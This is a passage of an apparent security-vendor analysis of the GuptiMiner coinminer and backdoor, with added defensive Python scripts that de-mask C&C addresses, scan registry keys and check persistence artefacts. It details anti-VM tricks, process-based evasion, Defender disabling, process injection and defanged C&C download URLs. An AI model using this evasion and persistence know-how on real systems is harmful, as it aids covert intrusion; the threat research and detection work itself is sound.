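```python
# Per-octet XOR mask described in the article: 0xA, 0xB, 0xC, 0xD.
MASK = (0xA, 0xB, 0xC, 0xD)
# The second A record carries a version and starts with these two octets.
VERSION_PREFIX = (23, 195)


def parse_ipv4(text: str):
    """Accept plain or defanged ("[.]") dotted-quad notation."""
    parts = text.replace("[.]", ".").split(".")
    if len(parts) != 4:
        raise ValueError(f"not a dotted quad: {text!r}")
    octets = tuple(int(p) for p in parts)
    if any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"octet out of range: {text!r}")
    return octets


def demask_ip(masked: str) -> str:
    """Undo the masking: XOR each octet with its positional mask value."""
    return ".".join(str(o ^ m) for o, m in zip(parse_ipv4(masked), MASK))


def version_from_ip(version_ip: str):
    """Extract the version carried in the 23.195.x.y record.

    Assumption (not stated in the article): x and y are compared as a
    (major, minor) pair, so 23.195.101.1 reads as version (101, 1)."""
    octets = parse_ipv4(version_ip)
    if octets[:2] != VERSION_PREFIX:
        raise ValueError(f"{version_ip!r} does not carry a version")
    return octets[2:]


def update_url_from_answers(answers, path_constant: str, current_version):
    """Given the two A records in the order the article describes (masked C&C
    first, version second), return the payload path the loader would request,
    or None when the advertised version is not newer than current_version."""
    masked, version_ip = answers
    if version_from_ip(version_ip) <= tuple(current_version):
        return None
    return f"{demask_ip(masked)}/{path_constant}/"


# The two answers the article quotes for www.elimpacific[.]net.
OBSERVED_ANSWERS = ("179.38.204[.]38", "23.195.101[.]1")

if __name__ == "__main__":
    print(update_url_from_answers(OBSERVED_ANSWERS, "elimp", (0, 0)))
```

<p>Run against passive DNS data for the queried server names, this gives the de-masked addresses to add to a blocklist; the version record alone is not worth blocking, since it is only a counter dressed up as an address.</p>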
  797.  
  798.  
  799. <div class="wp-block-image">
  800. <figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34.png"><img loading="lazy" decoding="async" width="1024" height="235" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34-1024x235.png" alt="" class="wp-image-8454" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34-1024x235.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34-300x69.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34-768x176.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34.png 1263w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>GuptiMiner is requesting the payload from a real IP address</em></figcaption></figure></div>
  801.  
  802.  
  803. <p>When the PNG file is downloaded, the rest of the process is the same as usual.&nbsp;</p>
  804.  
  805.  
  806.  
  807. <p>We’ve discovered two servers for this functionality so far:&nbsp;</p>
  808.  
  809.  
  810.  
  811. <figure class="wp-block-table"><table><tbody><tr><td><strong>Queried server</strong>&nbsp;</td><td><strong>URL path constant</strong>&nbsp;</td></tr><tr><td><code>www.elimpacific[.]net&nbsp;</code></td><td><code>elimp&nbsp;</code></td></tr><tr><td><code>www.espcomp[.]net&nbsp;</code></td><td><code>OpenSans&nbsp;</code></td></tr></tbody></table></figure>
  812.  
  813.  
  814.  
  815. <h3 class="wp-block-heading">Anti-VM and Anti-debug Tricks&nbsp;</h3>
  816.  
  817.  
  818.  
  819. <p><code><em>294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a</em><br><em>(2023-11-09 14:19:45 UTC)</em>&nbsp;</code></p>
  820.  
  821.  
  822.  
  823. <p>Along with the other updates described above, we also observed an evolution in the use of anti-VM and anti-debugging tricks. These work by checking for well-known disk drivers, registry keys, and running processes.</p>
  824.  
  825.  
  826.  
  827. <p>GuptiMiner checks for these disk drivers by enumerating<br><code>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum</code>:</p>
  828.  
  829.  
  830.  
  831. <ul>
  832. <li><code>vmware</code></li>
  833.  
  834.  
  835.  
  836. <li><code>qemu</code></li>
  837.  
  838.  
  839.  
  840. <li><code>vbox</code></li>
  841.  
  842.  
  843.  
  844. <li><code>virtualhd</code></li>
  845. </ul>
  846.  
  847.  
  848.  
  849. <p>In addition, the malware checks the registry key <code>HKEY_LOCAL_MACHINE\SOFTWARE\Cylance</code> for the presence of Cylance AV.</p>
  850.  
  851.  
  852.  
  853. <p>As further anti-VM measures, the malware also checks whether the system has more than 4 GB of available RAM and at least 4 CPU cores.</p>
  854.  
  855.  
  856.  
  857. <p>Last but not least, the malware also checks for the presence of these processes, matched by name prefix:</p>
  858.  
  859.  
  860.  
  861. <figure class="wp-block-table"><table><tbody><tr><td><strong>Process name prefix</strong></td><td><strong>Tool name</strong></td></tr><tr><td><code>wireshar</code></td><td>Wireshark</td></tr><tr><td><code>windbg.</code></td><td>WinDbg</td></tr><tr><td><code>tcpview</code></td><td>TCPView</td></tr><tr><td><code>360</code></td><td>360 Total Security</td></tr><tr><td><code>hips</code></td><td>Huorong Internet Security (<code>hipsdaemon.exe</code>)</td></tr><tr><td><code>proce</code></td><td>Process Explorer</td></tr><tr><td><code>procm</code></td><td>Process Monitor</td></tr><tr><td><code>ollydbg</code></td><td>OllyDbg</td></tr></tbody></table></figure>
  862.  
  863.  
  864.  
  865. <h3 class="wp-block-heading">Storing Images in Registry</h3>
  866.  
  867.  
  868.  
  869. <p><code><em>6305d66aac77098107e3aa6d85af1c2e3fc2bb1f639e4a9da619c8409104c414</em><br><em>(2023-02-22 14:03:04 UTC)</em>&nbsp;</code></p>
  870.  
  871.  
  872.  
  873. <p>Similarly to <a href="#storing-payloads-in-registry">Storing Payloads in Registry</a>, in later versions of GuptiMiner the authors also started saving the downloaded PNG images (containing the shellcodes) into the registry. Unlike the stored payloads, the images are not additionally XORed, since the shellcodes in them are already encrypted using RC2 (see the <a href="#dns-txt-decryption">DNS TXT Record Decryption</a> section for details).</p>
  874.  
  875.  
  876.  
  877. <p>So far, we have found the encrypted images containing the shellcodes stored under these registry keys:</p>
  878.  
  879.  
  880.  
  881. <ul>
  882. <li><code>SYSTEM\CurrentControlSet\Control\Arbiters\Class</code></li>
  883.  
  884.  
  885.  
  886. <li><code>SYSTEM\CurrentControlSet\Control\CMF\Class</code></li>
  887.  
  888.  
  889.  
  890. <li><code>SYSTEM\CurrentControlSet\Control\CMF\CORE</code></li>
  891.  
  892.  
  893.  
  894. <li><code>SYSTEM\CurrentControlSet\Control\CMF\DEF</code></li>
  895.  
  896.  
  897.  
  898. <li><code>SYSTEM\CurrentControlSet\Control\CMF\Els</code></li>
  899.  
  900.  
  901.  
  902. <li><code>SYSTEM\CurrentControlSet\Control\CMF\ASN</code></li>
  903.  
  904.  
  905.  
  906. <li><code>SYSTEM\CurrentControlSet\Control\MSDTC\BSR</code></li>
  907. </ul>
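As an added example (not code from the Avast write-up or from GuptiMiner itself), the following Python script hunts for such stored images under the keys listed above. Because the images are not XORed, the stored values should still begin with the PNG signature, so the check flags binary values that start with the PNG header and are long enough to carry a payload past the <code>0x325</code> offset that Stage 1 parses. The <code>winreg</code> enumeration only works on Windows; the classification logic is pure Python and is exercised against constructed sample values. The function names (<code>looks_like_stored_image</code>, <code>classify_values</code>, <code>hunt</code>) are this example's own.

```python
"""Hunt for PNG images stored as registry values under the keys named above.

Added example, not code from the Avast write-up or from GuptiMiner. The key
list comes from the article; the function names are assumptions of this
example. Registry access needs Windows; the classification runs anywhere.
"""
import sys
from typing import Iterable, Iterator, List, Tuple

try:
    import winreg  # Windows only
except ImportError:  # non-Windows host: classification still usable
    winreg = None

# HKLM subkeys the write-up lists as storage locations for the images.
IMAGE_STORE_KEYS = (
    r"SYSTEM\CurrentControlSet\Control\Arbiters\Class",
    r"SYSTEM\CurrentControlSet\Control\CMF\Class",
    r"SYSTEM\CurrentControlSet\Control\CMF\CORE",
    r"SYSTEM\CurrentControlSet\Control\CMF\DEF",
    r"SYSTEM\CurrentControlSet\Control\CMF\Els",
    r"SYSTEM\CurrentControlSet\Control\CMF\ASN",
    r"SYSTEM\CurrentControlSet\Control\MSDTC\BSR",
)

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Offset from which Stage 1 reads the appended shellcode (per the write-up).
SHELLCODE_OFFSET = 0x325


def looks_like_stored_image(data: bytes) -> bool:
    """True when a binary value carries an intact PNG header and is large
    enough for data to exist beyond the shellcode offset."""
    return data.startswith(PNG_SIGNATURE) and len(data) > SHELLCODE_OFFSET


def classify_values(values: Iterable[Tuple[str, object]]) -> List[str]:
    """Return the names of (name, data) pairs that look like stored PNGs.
    String and DWORD values are skipped; only REG_BINARY data is examined."""
    hits = []
    for name, data in values:
        if isinstance(data, (bytes, bytearray)) and looks_like_stored_image(bytes(data)):
            hits.append(name)
    return hits


def iter_registry_values(subkey: str) -> Iterator[Tuple[str, object]]:
    """Yield (name, data) for every value under HKLM\\subkey (Windows only)."""
    if winreg is None:
        return
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey, 0, winreg.KEY_READ)
    except OSError:  # key absent or access denied
        return
    with key:
        index = 0
        while True:
            try:
                name, data, _kind = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            yield name, data
            index += 1


def hunt() -> dict:
    """Scan every listed key; map subkey -> names of suspicious values."""
    findings = {}
    for subkey in IMAGE_STORE_KEYS:
        hits = classify_values(iter_registry_values(subkey))
        if hits:
            findings[subkey] = hits
    return findings


if __name__ == "__main__":
    if winreg is None:
        print("winreg unavailable on this platform; nothing scanned", file=sys.stderr)
    for subkey, names in hunt().items():
        print(f"HKLM\\{subkey}: suspicious values {names}")
```

Run it with administrative rights so the <code>SYSTEM</code> hive is readable. Note that the same <code>CMF\Class</code> key is reused later in the article by the PuTTY backdoor for its <code>Init</code> and <code>Sem</code> SMB-scan values, so any non-standard values under these keys merit a look even when they lack the PNG header.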
  908.  
  909.  
  910.  
  911. <h2 class="wp-block-heading">Stage 2 – Gzip Loader&nbsp;</h2>
  912.  
  913.  
  914.  
  915. <p><code><em>357009a70daacfc3379560286a134b89e1874ab930d84edb2d3ba418f7ad6a0b</em><br><em>(2019-04-02 07:30:21 UTC)</em>&nbsp;</code></p>
  916.  
  917.  
  918.  
  919. <p>This stage is the shortest: the Gzip loader, which is extracted and executed by the shellcode from the PNG file, is a simple PE that decompresses another shellcode using Gzip and executes it in a separate thread.</p>
  920.  
  921.  
  922.  
  923. <p>This thread additionally loads Stage 3, which we call Puppeteer and which orchestrates the core functionality of the malware – the cryptocurrency mining as well as, when applicable, deploying backdoors on the infected systems.</p>
  924.  
  925.  
  926.  
  927. <p>Throughout the GuptiMiner operation, the Gzip loader has not changed in later versions.</p>
  928.  
  929.  
  930.  
  931. <h2 class="wp-block-heading">Stage 3 – Puppeteer</h2>
  932.  
  933.  
  934.  
  935. <p><code><em>364984e8d62eb42fd880755a296bd4a93cc071b9705c1f1b43e4c19dd84adc65</em><br><em>(2019-03-15 10:07:36 UTC)</em>&nbsp;</code></p>
  936.  
  937.  
  938.  
  939. <p>Let’s now look at the biggest stage, Stage 3, the Puppeteer. It pulls its strings everywhere across the infected system, manipulating the GuptiMiner components to do its bidding, hence the name we’ve chosen. It orchestrates further actions and deploys the two core components of the malware – an XMRig coinminer and two types of backdoors that target devices present in large corporate networks. Of course, Puppeteer also introduces additional tricks to the arsenal of the whole GuptiMiner operation.</p>
  940.  
  941.  
  942.  
  943. <p>This stage also uses one of the many <code>Global\SLDV</code> mutexes which we described in the <a href="#mutexes-in-time">Mutex timeline</a>. For example, this particular sample uses <code>SLDV01</code> as its mutex.</p>
  944.  
  945.  
  946.  
  947. <h3 class="wp-block-heading">Puppeteer Setup</h3>
  948.  
  949.  
  950.  
  951. <p>Puppeteer performs several steps to set itself up properly. First, it adds a new power scheme in Windows so the PC does not go to sleep. If the CPU has only one core (anti-VM) or the mutex already exists, the malware stops functioning by going into an infinite sleep.</p>
  952.  
  953.  
  954.  
  955. <p>In the next phase, the malware kills all processes named <code>msiexec.exe</code>, <code>cmstp.exe</code>, or <code>credwiz.exe</code>. After that, it creates a separate thread that injects XMRig into a <code>credwiz.exe</code> process freshly created by the malware. The malware also disables Windows Defender by setting its service start type to disabled.</p>
  956.  
  957.  
  958.  
  959. <p>For persistence, Puppeteer takes an interesting approach. First, it creates a scheduled task with the following configuration:</p>
  960.  
  961.  
  962.  
  963. <ul>
  964. <li>A legitimate <code>rundll32.exe</code> file is copied and renamed to <code>C:\ProgramData\Microsoft\Crypto\Escan\dss.exe</code>, and this file is executed from the scheduled task</li>
  965.  
  966.  
  967.  
  968. <li>The malicious DLL is placed at <code>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3</code>, and this file is loaded by <code>dss.exe</code> (exported function <code>ValidateFile</code>)</li>
  969.  
  970.  
  971.  
  972. <li>The task is executed at every boot (<code>TASK_TRIGGER_BOOT</code>) with the <code>TASK_RUNLEVEL_HIGHEST</code> run level</li>
  973.  
  974.  
  975.  
  976. <li>The task is named and located at <code>C:\Windows\system32\tasks\Microsoft\windows\autochk\ESUpgrade</code></li>
  977. </ul>
  978.  
  979.  
  980.  
  981. <p>With that, the malware copies the content of <code>updll3.dll3</code> into memory and deletes the original file from disk. Puppeteer then waits for a system shutdown (similarly to <a href="#installation-improvements">Stage 0.9</a>) by polling the <code>SM_SHUTTINGDOWN</code> system metric every 100 milliseconds until it becomes non-zero, which indicates a shutdown. Only when a shutdown of the system is initiated does the malware write the <code>updll3.dll3</code> file back onto disk.</p>
  982.  
  983.  
  984.  
  985. <p>Putting the malicious DLL back just before the system restart is really sneaky, but it also has potentially negative consequences. If the victim’s device encounters a crash, power outage, or any other kind of unexpected shutdown, the file won’t be restored from memory and Puppeteer will stop working from that point on. Perhaps this is the reason why the authors removed this trick in later versions, trading sophistication for the malware’s stability.</p>
  986.  
  987.  
  988. <div class="wp-block-image">
  989. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36.png"><img loading="lazy" decoding="async" width="1126" height="1270" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36.png" alt="" class="wp-image-8456" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36.png 1126w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36-266x300.png 266w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36-908x1024.png 908w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36-768x866.png 768w" sizes="(max-width: 1126px) 100vw, 1126px" /></a><figcaption class="wp-element-caption"><em>A code ensuring the correct after-reboot execution</em></figcaption></figure></div>
  990.  
  991.  
  992. <p>The repeated loading of <code>updll3.dll3</code>, as seen in the code above, is in fact Puppeteer’s update process. The DLL ultimately requests a new <a href="#parsing-the-png-file">PNG shellcode</a> from the C&amp;C servers and, if it is a new version, the chain is updated.</p>
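As an added example (not code from the Avast write-up or from GuptiMiner), the following Python script checks a host for the persistence artefacts described in the steps above: the renamed <code>rundll32.exe</code> copy at <code>dss.exe</code>, the <code>ESUpgrade</code> task file, and the <code>updll3.dll3</code> DLL. The artefact paths are the ones named in the article; the location of the genuine <code>rundll32.exe</code> under <code>%SystemRoot%\System32</code> and the function names (<code>assess_persistence</code>, <code>is_renamed_copy</code>, <code>demo</code>) are assumptions of this example. Because the loader holds the DLL in memory and writes it back only at shutdown, the script treats a missing <code>updll3.dll3</code> as expected rather than as evidence of a clean host; <code>demo()</code> builds a constructed layout in a temporary directory to show the logic without touching the real paths.

```python
"""Check a host for the scheduled-task persistence described above.

Added example, not code from the Avast write-up or from GuptiMiner. The
artefact paths come from the article; the genuine rundll32.exe location and
the function names are assumptions of this example.
"""
import hashlib
import os
import shutil
import tempfile
from pathlib import Path
from typing import Optional

ESCAN_DIR = Path(r"C:\ProgramData\Microsoft\Crypto\Escan")
DSS_EXE = ESCAN_DIR / "dss.exe"          # renamed copy of a legitimate rundll32.exe
UPDLL3 = ESCAN_DIR / "updll3.dll3"       # malicious DLL, on disk only around reboots
TASK_FILE = Path(r"C:\Windows\system32\tasks\Microsoft\windows\autochk\ESUpgrade")
# Assumed location of the genuine rundll32.exe used for the hash comparison.
RUNDLL32 = Path(os.environ.get("SystemRoot", r"C:\Windows")) / "System32" / "rundll32.exe"


def sha256_of(path: Path) -> Optional[str]:
    """SHA-256 of a file, or None when it cannot be read."""
    try:
        return hashlib.sha256(path.read_bytes()).hexdigest()
    except OSError:
        return None


def is_renamed_copy(candidate: Path, original: Path) -> bool:
    """True when both files exist and are byte-identical."""
    digest = sha256_of(candidate)
    return digest is not None and digest == sha256_of(original)


def assess_persistence(dss: Path = DSS_EXE, rundll32: Path = RUNDLL32,
                       task: Path = TASK_FILE, dll: Path = UPDLL3) -> dict:
    """Collect the artefacts and derive a verdict.

    'persistence-present': task file and dss.exe both exist (the DLL may be
    absent, since the loader keeps it in memory until shutdown).
    'suspicious': only some artefacts exist.  'clean': none exist.
    """
    found = {
        "dss_exe_present": dss.is_file(),
        "dss_exe_is_rundll32_copy": is_renamed_copy(dss, rundll32),
        "task_file_present": task.is_file(),
        "updll3_on_disk": dll.is_file(),
    }
    if found["task_file_present"] and found["dss_exe_present"]:
        verdict = "persistence-present"
    elif any(found.values()):
        verdict = "suspicious"
    else:
        verdict = "clean"
    found["verdict"] = verdict
    found["note"] = ""
    if verdict != "clean" and not found["updll3_on_disk"]:
        # Expected between boots: the DLL is restored to disk only at shutdown.
        found["note"] = "updll3.dll3 not on disk; expected while the loader holds it in memory"
    return found


def demo() -> dict:
    """Assess a constructed layout: a stand-in rundll32.exe, its renamed copy
    dss.exe, a task file, and no DLL (mirroring the between-boots state)."""
    with tempfile.TemporaryDirectory(prefix="guptiminer-demo-") as tmp:
        root = Path(tmp)
        fake_rundll32 = root / "rundll32.exe"
        fake_rundll32.write_bytes(b"MZ constructed stand-in for rundll32.exe")
        shutil.copyfile(fake_rundll32, root / "dss.exe")
        (root / "ESUpgrade").write_text("<Task/>")  # constructed task file
        return assess_persistence(dss=root / "dss.exe", rundll32=fake_rundll32,
                                  task=root / "ESUpgrade", dll=root / "updll3.dll3")


if __name__ == "__main__":
    print("constructed layout:", demo())
    print("this host:", assess_persistence())
```

The hash comparison is the strongest of the four signals: a <code>dss.exe</code> whose SHA-256 equals that of the system's <code>rundll32.exe</code> is a renamed copy of a signed Microsoft binary in a directory where no such copy belongs. A file-only scan that runs while the DLL is held in memory will miss <code>updll3.dll3</code>, which is why the task file and the launcher are checked independently of it.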
  993.  
  994.  
  995.  
  996. <h3 class="wp-block-heading">XMRig Deployment&nbsp;</h3>
  997.  
  998.  
  999.  
  1000. <p>During the setup, Puppeteer created a separate thread for injecting an XMRig coinminer into the <code>credwiz.exe</code> process. Before the injection takes place, however, a few preparation steps are performed.</p>
  1001.  
  1002.  
  1003.  
  1004. <p>The XMRig configuration is embedded directly in the XMRig binary (as a standard JSON config), which is itself stored in the Puppeteer binary. This configuration can, however, be modified on the fly. In the example below, we can see a dynamic allocation of mining threads depending on the robustness of the infected system’s hardware.</p>
  1005.  
  1006.  
  1007. <div class="wp-block-image">
  1008. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-37.png"><img loading="lazy" decoding="async" width="393" height="141" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-37.png" alt="" class="wp-image-8457" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-37.png 393w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-37-300x108.png 300w" sizes="(max-width: 393px) 100vw, 393px" /></a><figcaption class="wp-element-caption"><em>Patching the XMRig configuration on the fly, dynamically assigning mining threads</em></figcaption></figure></div>
  1009.  
  1010.  
  1011. <p>The injection is standard: the malware creates a new suspended <code>credwiz.exe</code> process and, if successful, the coinminer is injected and executed using the <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code> combination.</p>
  1012.  
  1013.  
  1014.  
  1015. <p>Puppeteer continuously monitors the system for running processes, by default every 5 seconds. If it encounters any of the monitoring tools below, the malware stops any existing mining by taking down the whole <code>credwiz.exe</code> process and applies a progressive sleep, postponing the next re-injection attempt by an additional 5 hours.</p>
  1016.  
  1017.  
  1018.  
  1019. <ul>
  1020. <li><code>taskmgr.exe</code>&nbsp;</li>
  1021.  
  1022.  
  1023.  
  1024. <li><code>autoruns.exe</code>&nbsp;</li>
  1025.  
  1026.  
  1027.  
  1028. <li><code>wireshark.exe</code>&nbsp;</li>
  1029.  
  1030.  
  1031.  
  1032. <li><code>wireshark-gtk.exe</code>&nbsp;</li>
  1033.  
  1034.  
  1035.  
  1036. <li><code>tcpview.exe</code>&nbsp;</li>
  1037. </ul>
  1038.  
  1039.  
  1040.  
  1041. <p>Furthermore, the malware needs to locate the current <code>updll3.dll3</code> on the system so that its latest version can be stored in memory, removed from disk, and dropped again just before the next system restart. Two approaches are used to achieve this:</p>
  1042.  
  1043.  
  1044.  
  1045. <ul>
  1046. <li>Reading eScan folder location from <code>HKEY_LOCAL_MACHINE\SOFTWARE\AVC3</code>&nbsp;</li>
  1047.  
  1048.  
  1049.  
  1050. <li>If one of the checked processes is called <code>download.exe</code>, which is a legitimate eScan binary, the malware obtains that file’s location to discover the folder. The output can look like this:
  1051. <ul>
  1052. <li><code>\Device\HarddiskVolume1\Program Files (x86)\eScan\download.exe</code>&nbsp;</li>
  1053. </ul>
  1054. </li>
  1055. </ul>
  1056.  
  1057.  
  1058.  
  1059. <p>The check for <code>download.exe</code> serves as an alternative way of locating the eScan installation folder, and the code seems heavily inspired by the example code of <a href="https://learn.microsoft.com/en-us/windows/win32/memory/obtaining-a-file-name-from-a-file-handle" target="_blank" rel="noreferrer noopener">Obtaining a File Name From a File Handle</a> on MSDN.</p>
  1060.  
  1061.  
  1062.  
  1063. <p>Finally, Puppeteer also continuously monitors the CPU usage on the system and tweaks the core allocation in such a way that it is not <em>that much</em> of a resource hog and stays under the radar.</p>
  1064.  
  1065.  
  1066.  
  1067. <h3 class="wp-block-heading" id="backdoor-setup">Backdoor Setup</h3>
  1068.  
  1069.  
  1070.  
  1071. <p><code><em>4dfd082eee771b7801b2ddcea9680457f76d4888c64bb0b45d4ea616f0a47f21</em><br><em>(2019-06-29 03:38:24 UTC)</em>&nbsp;</code></p>
  1072.  
  1073.  
  1074.  
  1075. <p>The backdoor is set up by the previous stage, Puppeteer, which first discovers whether the machine is running Windows Server. This is done by checking for the DNS Server registry key (the DNS Server service typically runs on Windows Server editions):<br><code>SOFTWARE\Microsoft\Windows NT\CurrentVersion\DNS Server</code></p>
  1076.  
  1077.  
  1078.  
  1079. <p>After that, the malware runs a command to get the number of computers joined to the domain:<br><code>net group "domain computers" /domain</code></p>
  1080.  
  1081.  
  1082.  
  1083. <p>The data printed by the <code>net group</code> command typically uses 25 characters per domain-joined computer plus a newline (<code>CR+LF</code>) after every three computers, as illustrated by the example below:</p>
  1084.  
  1085.  
  1086. <div class="wp-block-image">
  1087. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png"><img loading="lazy" decoding="async" width="502" height="80" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png" alt="" class="wp-image-8460" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png 502w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39-300x48.png 300w" sizes="(max-width: 502px) 100vw, 502px" /></a><figcaption class="wp-element-caption"><em>Example output of net group command</em></figcaption></figure></div>
  1088.  
  1089.  
  1090. <p>In this version of the backdoor setup, Puppeteer checks whether the number of returned bytes is more than 100. If so, Puppeteer assumes it runs in a network shared with at least five computers, downloads an additional payload from a hardcoded C&amp;C (<code>https://m.airequipment[.]net/gpse/</code>), and executes it using a PowerShell command.</p>
  1091.  
  1092.  
  1093.  
  1094. <p>Note that the threshold for the number of returned bytes was different and significantly higher in later versions of GuptiMiner, as can be seen in the dedicated section discussing the <a href="#modular-backdoor">Modular Backdoor</a>, meaning that only networks with more than 7000 computers joined to the same domain were compromised!</p>
  1095.  
  1096.  
  1097.  
  1098. <p>If the checks above pass, Puppeteer uses a PowerShell command to download and execute the payload and, interestingly, it is run both in the current process and injected into <code>explorer.exe</code>.</p>
  1099.  
  1100.  
  1101.  
  1102. <figure class="wp-block-image size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-40.png"><img loading="lazy" decoding="async" width="850" height="72" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-40.png" alt="" class="wp-image-8461" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-40.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-40-300x25.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-40-768x65.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a></figure>
  1103.  
  1104.  
  1105.  
  1106. <p>Furthermore, regardless of whether the infected computer is present in a network of a certain size or not, it also tries to download an additional payload from <code>dl.sneakerhost[.]com/u</code>. This payload is yet another PNG file with the appended shellcode. We know this because the code uses the exact same parsing from the specific offset <code>0x325</code> of the PNG file as described in <a href="#png-loader">Stage 1</a>. However, during our analysis this domain had already been taken down, and we couldn’t verify what kind of payload was being distributed here.</p>
  1107.  
  1108.  
  1109.  
  1110. <p>Puppeteer’s backdoor setup process was improved and tweaked multiple times during its long development. In the upcoming subsections, we will focus on the more important changes, mostly those which influence other parts of the malware or introduce a whole new functionality.</p>
  1111.  
  1112.  
  1113.  
  1114. <h3 class="wp-block-heading">Later Puppeteer Versions&nbsp;</h3>
  1115.  
  1116.  
  1117.  
  1118. <p>In later versions, the attackers switched to the datetime mutex paradigm (as illustrated in the <a href="#mutexes-in-time">Mutexes in Time</a> section) and also introduced additional process monitoring of more Sysinternals tools like Process Explorer and Process Monitor, as well as other tools like OllyDbg, WinDbg, and TeamViewer.</p>
  1119.  
  1120.  
  1121.  
  1122. <h4 class="wp-block-heading">Pool Configuration</h4>
  1123.  
  1124.  
  1125.  
  1126. <p><code><em>487624b44b43dacb45fd93d03e25c9f6d919eaa6f01e365bb71897a385919ddd</em><br><em>(2023-11-21 18:05:43 UTC)</em>&nbsp;</code></p>
  1127.  
  1128.  
  1129.  
  1130. <p>Additionally, the GuptiMiner authors also started to modify the pool addresses in XMRig configurations with a new approach. They started using the subdomains “<code>r</code>” and “<code>m</code>”, chosen depending on the physical memory available on the infected system. If there is at least 3 GB of RAM available, the malware uses:<br><code>m.domain.tld</code> with <code>auto</code> mode and huge pages enabled.</p>
  1131.  
  1132.  
  1133.  
  1134. <p>If the available RAM is less than 3 GB, it uses:<br><code>r.domain.tld</code> with <code>light</code> mode and huge pages disabled.</p>
  1135.  
  1136.  
  1137.  
  1138. <p>In order to <strong>not</strong> keep things simple, the authors later also started to use “<code>p</code>” as a subdomain in some versions, without any specific reason for the naming convention (perhaps just to say it is a “pool”).&nbsp;</p>
  1139.  
  1140.  
  1141.  
  1142. <p>The usage of all such domains in time can be seen in the <a href="#domains-in-time">Domains timeline</a>.&nbsp;</p>
  1143.  
  1144.  
  1145.  
  1146. <h4 class="wp-block-heading">Variety in Used DLLs&nbsp;</h4>
  1147.  
  1148.  
  1149.  
  1150. <p>Over the years, Puppeteer has used many different DLL names and locations, either for sideloading or for direct loading via scheduled tasks. For example:</p>
  1151.  
  1152.  
  1153.  
  1154. <ul>
  1155. <li><code>C:\Program Files (x86)\eScan\updll3.dll3</code></li>
  1156.  
  1157.  
  1158.  
  1159. <li><code>C:\Program Files\Common Files\SYSTEM\SysResetErr\SysResetErr.DLL</code></li>
  1160.  
  1161.  
  1162.  
  1163. <li><code>C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellChecking.DLL</code></li>
  1164.  
  1165.  
  1166.  
  1167. <li><code>C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellCheckingHost.DLL</code></li>
  1168.  
  1169.  
  1170.  
  1171. <li><code>C:\ProgramData\AMD\CNext\atiadlxx.dll</code></li>
  1172.  
  1173.  
  1174.  
  1175. <li><code>C:\ProgramData\Microsoft\Assistance\LunarG\vulkan-1.dll</code></li>
  1176.  
  1177.  
  1178.  
  1179. <li><code>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll</code></li>
  1180.  
  1181.  
  1182.  
  1183. <li><code>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3</code></li>
  1184.  
  1185.  
  1186.  
  1187. <li><code>C:\ProgramData\Microsoft\Network\Escan\AutoWake.dll</code></li>
  1188. </ul>
  1189.  
  1190.  
  1191.  
  1192. <h4 class="wp-block-heading">Puppeteer Cleanup&nbsp;</h4>
  1193.  
  1194.  
  1195.  
  1196. <p><code><em>1c31d06cbdf961867ec788288b74bee0db7f07a75ae06d45d30355c0bc7b09fe</em><br><em>(2020-03-09 00:57:11 UTC)</em></code></p>
  1197.  
  1198.  
  1199.  
  1200. <p>We’ve also seen “cleaner” Puppeteers, meaning they did not contain the backdoor setup process but were able to delete the malicious DLLs from the system when a running monitoring tool was detected.</p>
  1201.  
  1202.  
  1203.  
  1204. <h4 class="wp-block-heading" id="deploy-per-quarter">Deploy Per-Quarter&nbsp;</h4>
  1205.  
  1206.  
  1207.  
  1208. <p><code><em>1fbc562b08637a111464ba182cd22b1286a185f7cfba143505b99b07313c97a4</em><br><em>(2021-03-01 10:43:27 UTC)</em>&nbsp;</code></p>
  1209.  
  1210.  
  1211.  
  1212. <p>In this particular version, the deployment of the backdoor was performed once every 3 months, i.e. a per-quarter deployment.</p>
  1213.  
  1214.  
  1215. <div class="wp-block-image">
